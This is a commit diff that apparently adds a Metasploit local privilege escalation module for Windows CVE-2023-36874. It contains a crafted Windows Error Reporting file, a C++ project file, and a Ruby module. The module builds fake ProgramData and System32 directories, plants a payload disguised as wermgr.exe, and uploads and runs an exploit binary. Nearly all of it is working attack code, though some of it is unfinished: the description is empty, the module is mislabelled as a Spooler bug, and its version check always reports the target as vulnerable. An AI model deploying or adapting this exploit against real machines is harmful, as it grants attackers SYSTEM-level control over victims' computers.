Add module to create directory structures and upload/run exploit

data/exploits/CVE-2023-36874/Report.wer

@@ -0,0 +1,118 @@
+Version=1
+EventType=StoreAgentScanForUpdatesFailure0
+EventTime=133371852298359326
+Consent=1
+UploadTime=133371852327108184
+ReportStatus=268435456
+ReportIdentifier=04483ba0-2fcb-4d99-abf4-fabf7b00614b
+Wow64Host=34404
+OriginalFilename=svchost.exe
+AppSessionGuid=000029dc-0000-0005-3c82-3347fcd4d901
+TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!00003f64c98f22da277a07cab248c44c56eedb796a81!svchost.exe
+TargetAppVer=2028//05//11:16:56:05!1513f!svchost.exe
+BootId=4294967295
+TargetAsId=326
+IsFatal=4294967295
+EtwNonCollectReason=4
+Response.BucketId=025c9c6b880ea9b8020c191e3cf7e8f4
+Response.BucketTable=5
+Response.LegacyBucketId=1300442010065823988
+Response.type=4
+Sig[0].Name=ClientAppId
+Sig[0].Value=Update;
+Sig[1].Name=HResult
+Sig[1].Value=80070002
+Sig[2].Name=OSVersion
+Sig[2].Value=22621
+Sig[3].Name=OSRevision
+Sig[3].Value=1702
+Sig[4].Name=DeviceClass
+Sig[4].Value=Windows.Desktop
+DynamicSig[1].Name=OS Version
+DynamicSig[1].Value=10.0.22621.2.0.0.256.48
+DynamicSig[2].Name=Locale ID
+DynamicSig[2].Value=1033
+State[0].Key=Transport.DoneStage1
+State[0].Value=1
+OsInfo[0].Key=vermaj
+OsInfo[0].Value=10
+OsInfo[1].Key=vermin
+OsInfo[1].Value=0
+OsInfo[2].Key=verbld
+OsInfo[2].Value=22621
+OsInfo[3].Key=ubr
+OsInfo[3].Value=1702
+OsInfo[4].Key=versp
+OsInfo[4].Value=0
+OsInfo[5].Key=arch
+OsInfo[5].Value=9
+OsInfo[6].Key=lcid
+OsInfo[6].Value=1033
+OsInfo[7].Key=geoid
+OsInfo[7].Value=244
+OsInfo[8].Key=sku
+OsInfo[8].Value=48
+OsInfo[9].Key=domain
+OsInfo[9].Value=0
+OsInfo[10].Key=prodsuite
+OsInfo[10].Value=256
+OsInfo[11].Key=ntprodtype
+OsInfo[11].Value=1
+OsInfo[12].Key=platid
+OsInfo[12].Value=10
+OsInfo[13].Key=sr
+OsInfo[13].Value=0
+OsInfo[14].Key=tmsi
+OsInfo[14].Value=0
+OsInfo[15].Key=osinsty
+OsInfo[15].Value=2
+OsInfo[16].Key=iever
+OsInfo[16].Value=11.1.22621.0-11.0.1000
+OsInfo[17].Key=portos
+OsInfo[17].Value=0
+OsInfo[18].Key=ram
+OsInfo[18].Value=7998
+OsInfo[19].Key=svolsz
+OsInfo[19].Value=79
+OsInfo[20].Key=wimbt
+OsInfo[20].Value=0
+OsInfo[21].Key=blddt
+OsInfo[21].Value=220506
+OsInfo[22].Key=bldtm
+OsInfo[22].Value=1250
+OsInfo[23].Key=bldbrch
+OsInfo[23].Value=ni_release
+OsInfo[24].Key=bldchk
+OsInfo[24].Value=0
+OsInfo[25].Key=wpvermaj
+OsInfo[25].Value=0
+OsInfo[26].Key=wpvermin
+OsInfo[26].Value=0
+OsInfo[27].Key=wpbuildmaj
+OsInfo[27].Value=0
+OsInfo[28].Key=wpbuildmin
+OsInfo[28].Value=0
+OsInfo[29].Key=osver
+OsInfo[29].Value=10.0.22621.1702.amd64fre.ni_release.220506-1250
+OsInfo[30].Key=buildflightid
+OsInfo[31].Key=edition
+OsInfo[31].Value=Professional
+OsInfo[32].Key=ring
+OsInfo[32].Value=Retail
+OsInfo[33].Key=expid
+OsInfo[33].Value=ME:25762F0,MD:27B9BC4
+OsInfo[34].Key=fconid
+OsInfo[35].Key=containerid
+OsInfo[36].Key=containertype
+OsInfo[37].Key=edu
+OsInfo[37].Value=0
+OsInfo[38].Key=servicinginprogress
+OsInfo[38].Value=0
+OsInfo[39].Key=featureupdatependingreboot
+OsInfo[39].Value=0
+FriendlyEventName=StoreAgentScanForUpdatesFailure0
+ConsentKey=StoreAgentScanForUpdatesFailure0
+AppName=Host Process for Windows Services
+AppPath=C:\Windows\System32\svchost.exe
+ApplicationIdentity=00000000000000000000000000000000
+MetadataHash=-260274402

external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/~AutoRecover.CVE-2023-36874.vcxproj

@@ -0,0 +1,150 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{4cbf3aca-76e5-4c6a-9483-ca2adc6eaf6b}</ProjectGuid>
+    <RootNamespace>CVE202336874</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve_2023_36874.cpp.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="def.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

modules/exploits/windows/local/cve_2023_36874.rb

@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'bwatters-r7' # msf module
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [
+          [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-07-11',
+        'References' => [
+          ['CVE', '2023-36874'],
+          ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+        },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_fs_delete_file
+              stdapi_sys_config_getenv
+            ]
+          }
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('EXPLOIT_NAME',
+                    [true, 'The filename to use for the exploit binary (%RAND% by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
+      OptString.new('REPORT_DIR',
+                    [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
+      OptString.new('REPORT_NAME',
+                    [true, 'The Error report name (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
+      OptString.new('WRITABLE_DIR',
+                    [false, 'Path to write binaries (%TEMP% by default).', nil]),
+      OptInt.new('EXECUTE_DELAY',
+                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])
+    ])
+  end
+
+  def upload_error_report
+    wer_archive_dir = session.sys.config.getenv('PROGRAMDATA')
+    vprint_status(wer_archive_dir)
+    wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'
+    report_dir = "#{wer_archive_dir}\\MyReport"
+    report_filename = "#{report_dir}\\Report.wer"
+    vprint_status("Creating #{report_dir}")
+    mkdir(report_dir)
+    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
+    vprint_status("Writing Report to #{report_filename}")
+    write_file(report_filename, wer_report_data)
+  end
+
+  def build_shadow_archive_dir(shadow_base_dir)
+    wer_archive_dir = shadow_base_dir
+    mkdir(wer_archive_dir)
+    wer_archive_dir << '\\ProgramData\\'
+    mkdir(wer_archive_dir)
+    wer_archive_dir << 'Microsoft\\'
+    mkdir(wer_archive_dir)
+    wer_archive_dir << 'Windows\\'
+    mkdir(wer_archive_dir)
+    wer_archive_dir << 'WER\\'
+    mkdir(wer_archive_dir)
+    wer_archive_dir << 'ReportArchive\\'
+    mkdir(wer_archive_dir)
+    report_dir = "#{wer_archive_dir}MyReport"
+    mkdir(report_dir)
+    return report_dir
+  end
+
+  def upload_shadow_report(shadow_archive_dir)
+    report_filename = "#{shadow_archive_dir}\\Report.wer"
+    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
+    vprint_status("Writing bad Report to #{report_filename}")
+    write_file(report_filename, wer_report_data)
+  end
+
+  def build_shadow_system32(shadow_base_dir)
+    shadow_win32 = "#{shadow_base_dir}\\windows"
+    vprint_status("Creating #{shadow_win32}")
+    mkdir(shadow_win32)
+    shadow_win32 = "#{shadow_win32}\\system32"
+    vprint_status("Creating #{shadow_win32}")
+    mkdir(shadow_win32)
+    return shadow_win32
+  end
+
+  def upload_payload(shadow_win32)
+    payload_bin = generate_payload_exe
+    payload_filename = "#{shadow_win32}\\wermgr.exe"
+    vprint_status("Writing payload to #{payload_filename}")
+    write_file(payload_filename, payload_bin)
+  end
+
+  def upload_execute_exploit(exploit_path)
+    exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')
+    vprint_status('Fuck') if exploit_bin.nil?
+    write_file(exploit_path, exploit_bin)
+    sleep(5)
+    vprint_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
+    output = cmd_exec('cmd.exe', "/c #{exploit_path}")
+    vprint_status(output)
+  end
+
+  def validate_active_host
+    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+  rescue Rex::Post::Meterpreter::RequestError => e
+    elog('Could not connect to session', error: e)
+    raise Msf::Exploit::Failed, 'Could not connect to session'
+  end
+
+  def check
+    version = get_version_info
+    vprint_status("OS version: #{version}")
+    return Exploit::CheckCode::Appears
+    # if version.build_number.between?(Msf::WindowsVersion::Win10_InitialRelease, Msf::WindowsVersion::Win10_1909)
+    # return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    shadow_base_dir = 'C:\test'
+    # "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(6..14)}"
+    validate_active_host
+    upload_error_report
+    shadow_archive_dir = build_shadow_archive_dir(shadow_base_dir.dup)
+    upload_shadow_report(shadow_archive_dir)
+    shadow_system32 = build_shadow_system32(shadow_base_dir.dup)
+    upload_payload(shadow_system32)
+    sleep 20
+    exploit_path = "#{shadow_base_dir}\\#{datastore['EXPLOIT_NAME']}"
+    upload_execute_exploit(exploit_path)
+  end
+end